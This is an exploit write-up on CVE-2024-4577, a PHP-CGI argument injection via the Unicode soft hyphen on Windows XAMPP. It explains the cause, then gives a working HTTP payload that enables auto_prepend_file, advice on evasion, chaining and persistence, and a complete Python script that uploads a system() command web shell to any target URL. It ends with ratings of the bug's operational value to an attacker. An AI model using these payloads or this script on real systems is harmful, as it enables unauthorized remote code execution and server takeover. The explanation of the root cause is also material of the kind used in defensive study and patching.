Introduction
Recently, a significant vulnerability in PHP, designated as CVE-2024-4577, was disclosed by security researcher Orange Tsai. This vulnerability specifically affects XAMPP installations on Windows when PHP is configured to run in CGI mode, and it can be exploited under certain locales, such as Chinese (simplified and traditional) and Japanese.
Root Cause
The CVE-2024-4577 vulnerability stems from how PHP, when running in CGI mode, processes Unicode characters in command-line arguments. Specifically, the issue lies in the handling and interpretation of the Unicode "soft hyphen" character (0xAD) compared to the standard hyphen (0x2D).
In CGI mode, web servers parse HTTP requests and pass them to a PHP script for processing. For example, a request to http://host/cgi.php?foo=bar might be translated and executed as php.exe cgi.php foo=bar. The vulnerability arises because while the web server escapes a standard hyphen (0x2D) to prevent command injection, it does not escape the soft hyphen (0xAD). When PHP processes this character, it interprets it as a real hyphen, enabling attackers to inject additional command-line arguments.
Exploitability
The key to exploiting this vulnerability is to insert the soft hyphen character in place of the standard hyphen in command-line arguments. This allows attackers to inject PHP configuration directives directly into the execution command:
POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: victim.com
User-Agent: curl/8.3.0
Accept: /
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
<?php
phpinfo();
?>
In this request, the soft hyphen is used to bypass input sanitization, leading to remote code execution (RCE) if successful.
Locale-Specific Exploitation
This vulnerability is locale-dependent, primarily affecting Chinese and Japanese locales. This means that successful exploitation may require knowledge or manipulation of the target system's locale settings.
Command Injection via Soft Hyphen
The primary exploitation technique involves replacing the standard hyphen with the soft hyphen (0xAD) in the query string. This subtle difference is not escaped by the web server but is interpreted by PHP as a legitimate command-line argument.
Adaptation of Older Techniques
Given the similarity to the older CVE-2012-1823 vulnerability, existing exploitation techniques can be adapted. For instance, injecting PHP directives like -d allow_url_include=1 -d auto_prepend_file=php://input can enable execution of PHP code provided in the HTTP request body.
Unicode Evasion: Exploit developers can experiment with other Unicode characters that may be interpreted differently by various components of the server and PHP environment.
Automated Locale Detection: Integrate automated scripts to detect and adjust to the locale settings of the target system dynamically, enhancing the robustness of the exploit.
Chained Exploits: Combine this vulnerability with other known weaknesses in the web server or PHP configuration to escalate privileges or maintain persistence.
Exploit Code:
(https://github.com/openexploitresearch/exploits/blob/main/php/php_cgi_exploit.py).
import requests
import argparse
def upload_webshell(url):
payloads = [
'/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input',
'/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input'
]
webshell = '<?php if(isset($_REQUEST["cmd"])){system($_REQUEST["cmd"]);} ?>'
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
for payload in payloads:
shell_url = f"{url}{payload}"
try:
response = requests.post(shell_url, headers=headers, data=webshell)
if response.status_code == 200:
print(f"(+) Webshell uploaded at: {shell_url}")
else:
print(f"(-) Failed to upload webshell at: {shell_url}")
except Exception as e:
print(f"(!) Error uploading webshell to {shell_url}: {e}")
def main():
parser = argparse.ArgumentParser(description="PHP CGI Argument Injection Exploit FullChain")
parser.add_argument('--target', '-t', dest='target', help='Target URL', required=True)
args = parser.parse_args()
target_url = args.target.rstrip('/')
upload_webshell(target_url)
if __name__ == "__main__":
main()
Impact Rating: 4/10
The limited number of affected targets significantly lowers the overall impact of this vulnerability. Although it has the potential for remote code execution (RCE), the specific conditions required for exploitation make it less of a threat in most environments.
Strategic Value: 3.5/10
Due to its primary impact on development environments and smaller servers, the strategic value of this vulnerability is relatively low. Its use in broader attacks is constrained by the difficulty in finding suitable targets.
Operational Value: 6/10
While the simplicity of the exploit and the presence of XAMPP installations provide some operational value, the challenge in finding vulnerable targets reduces its overall utility. Despite this, the ability to execute arbitrary PHP code can still be leveraged for specific malicious activities when suitable conditions are met.
